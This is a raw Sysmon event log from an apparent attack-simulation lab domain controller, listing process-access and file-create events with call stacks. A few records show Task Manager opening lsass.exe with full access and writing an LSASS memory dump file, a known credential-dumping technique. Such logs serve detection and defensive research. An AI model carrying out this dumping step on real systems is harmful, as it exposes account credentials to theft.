Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80395A558D8)|UNKNOWN(FFFFFDAC0E4B4998)|UNKNOWN(FFFFFDAC0E4B4B17)|UNKNOWN(FFFFFDAC0E4AF1A1)|UNKNOWN(FFFFFDAC0E4B0B6A)|UNKNOWN(FFFFFDAC0E4AEE26)|UNKNOWN(FFFFF8039576CE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205106Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:54.426{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1594-601B-FD37-00000000A301}3796C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205110Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:55.645{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205109Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:55.645{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205114Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:57.941{29E67E80-7CBF-6019-1400-00000000A301}12521384C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205113Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:57.926{29E67E80-16F9-601B-3D38-00000000A301}44006524C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\system32\dbgcore.DLL+15a38|C:\Windows\system32\dbgcore.DLL+e3f5|C:\Windows\system32\dbgcore.DLL+b027|C:\Windows\system32\dbgcore.DLL+5db1|C:\Windows\system32\dbgcore.DLL+67d3|C:\Windows\system32\taskmgr.exe+83bcb|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000205112Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:57.910{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\lsass (2).DMP2021-02-03 21:34:57.910 10341000x8000000000000000205111Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:57.910{29E67E80-16F9-601B-3D38-00000000A301}44006168C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+8097e|C:\Windows\system32\taskmgr.exe+79b6b|C:\Windows\system32\taskmgr.exe+91de4|C:\Windows\system32\taskmgr.exe+7f422|C:\Windows\system32\taskmgr.exe+7f260|C:\Windows\system32\taskmgr.exe+7d145|C:\Windows\system32\DUI70.dll+48c18|C:\Windows\system32\DUI70.dll+188eb|C:\Windows\system32\DUser.dll+b431|C:\Windows\system32\DUser.dll+9808|C:\Windows\system32\DUser.dll+993b|C:\Windows\system32\DUser.dll+c1da|C:\Windows\system32\DUser.dll+c01f|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80395A558D8)|UNKNOWN(FFFFFDAC0E4F8B30)|UNKNOWN(FFFFFDAC0E4AFB26)|UNKNOWN(FFFFF8039576CE03)|C:\Windows\System32\win32u.dll+1164 10341000x8000000000000000205117Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:58.926{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205116Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:58.926{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205115Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:58.926{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205120Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:03.551{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205119Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:03.551{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205118Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:03.551{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205121Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:06.222{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205122Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:17.003{29E67E80-7CBD-6019-0B00-00000000A301}8565960C:\Windows\system32\lsass.exe{29E67E80-7CBB-6019-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000205123Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:18.706{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1545-601B-E837-00000000A301}1100C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205156Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.178{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205155Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.178{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205154Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.178{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205153Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205152Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205151Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205150Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205149Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205148Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205147Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205146Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205145Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205144Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205143Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205142Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:35:22.177{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205141Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 